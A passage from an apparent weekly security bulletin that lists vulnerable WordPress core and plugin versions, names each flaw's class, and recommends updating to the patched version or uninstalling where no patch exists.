Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: YOP Poll

Vulnerability: IP Spoofing via X-Forwarded-For header
Patched Version: 6.4.3
Recommended Action: Update to version 6.4.3, or a newer patched version

Plugin: Woocommerce Shipping Canada Post

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Easy Table of Contents

Vulnerability: Missing Authorization via eztoc_reset_options_to_default
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Form builder to get in touch with visitors and grow your email list — Happyforms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.25.10
Recommended Action: Update to version 1.25.10, or a newer patched version

Plugin: Recipe Card Blocks for Gutenberg & Elementor – Best WordPress Recipe Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.37
Recommended Action: Update to version 1.37, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: SQL Injection
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Attachment Name #2
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Count per Day

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: woocommerce-one-page-checkout

Vulnerability: Authenticated (Contributor+) Local File Inclusion via `woocommerce_one_page_checkout`
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Site Offline or Coming Soon

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CSS Hero

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.07
Recommended Action: Update to version 4.07, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Exchange Addon Custom URL Tracking

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Nifty Newsletters (Formerly Sola Newsletters)

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Path Disclosure
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: GenerateBlocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP iCommerce – the first interactive ecommerce for wordpress

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPFront User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Current Book

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Product Catalog

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.26
Recommended Action: Update to version 5.0.26, or a newer patched version

Plugin: Bug Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Shortcode SQL Injection
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Events Calendar

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: iMember360is

Vulnerability: Missing Authorization and Sensitive Data Exposure
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

***

Check out the Watch Out Wednesday Archive for past Watch Out Wednesday posts.